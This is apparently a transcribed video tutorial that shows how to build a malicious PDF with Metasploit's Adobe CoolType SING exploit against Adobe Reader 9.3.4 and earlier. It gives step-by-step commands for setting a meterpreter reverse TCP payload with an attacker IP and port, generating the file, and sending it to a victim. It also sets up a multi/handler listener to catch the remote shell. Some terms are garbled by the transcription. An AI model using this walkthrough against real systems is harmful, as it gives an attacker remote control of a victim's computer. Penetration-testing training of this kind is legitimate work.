Welcome. In this video, we will see file format based exploitation. We will see PDF based exploits. PDF file format exploits are those that create malicious PDF files which, when run on the victim system, will give the attacker complete access to the target system in the form of Metasploit shell. Here is a test cases and description. The vulnerability is Stack Overflow in unique name from the smart independent clip set table. Exploited on operating system is Windows 7 32-bit. Software version Adobe Reader 9. Affected version is Adobe Reader 9.3.4 and earlier version for Windows, Macintosh and Unix system. CV details, that is exploitation proofread. To exploit the vulnerability, we will create a malicious file and we will send it to the victim. When the victim tries to open our malicious PDF file, we will be able to get the Metasploit shell or the command shell based on payload used. Let's take a step further and try to build malicious PDF file. Let's open up Metasploit command prompt, load Adobe cold type sync module. So type use exploit /windows file format /adobe cool type SING. Let's see what options we need to set in order to execute the attack properly. We set the payload as reverse_TCP to create a connection back to the attacker machine from the victim system. Type set payload windows /meterpreter reverse_TCP. This is because we are not connecting to the victim directly. A victim may open a file eventually. Therefore, reverse_TCP will create a connection to the listener at the attacker system. We set all of the required options such as lhost and lport. These are required for making a correct connection back to the attacker's machine. Typeset lhost 192.168.0.12. Lport is 4444. After setting all of the options, we use the exploit command to create our malicious file. Here you can see that msf.pdf file is saved in root /msf4/local msf.pdf. Send this file to the victim. We need to launch an exploit handler which will listen to all of the connection made from PDF file to the attacker's machine. An exploit /multi/handler is very useful module in Metasploit that can handle any type of exploit connection that a victim's machine makes after exploitation. So that's it in this video on file format based exploitation, which you saw on PDF based exploits. Thank you for watching this video.